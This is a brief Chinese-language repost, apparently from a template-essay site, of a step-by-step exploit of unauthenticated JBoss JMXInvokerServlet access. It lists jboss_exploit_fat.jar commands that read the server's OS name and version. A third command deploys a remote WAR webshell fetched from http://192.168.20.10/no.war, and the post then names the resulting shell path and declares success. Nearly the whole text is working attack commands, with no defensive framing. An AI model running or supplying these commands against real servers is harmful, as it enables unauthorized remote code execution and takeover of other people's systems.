600字范文,内容丰富有趣,生活中的好帮手!
600字范文 > Jboss未授权访问部署木马 利用exp

Jboss未授权访问部署木马 利用exp

时间:2022-03-21 04:09:33

相关推荐

Jboss未授权访问部署木马 利用exp

查看系统名称

java -jar jboss_exploit_fat.jar -i :8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

查看系统版本

java -jar jboss_exploit_fat.jar -i :8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.远程部署war

java -jar jboss_exploit_fat.jar -i :8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:

:8080/no/index.jsp

成功!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。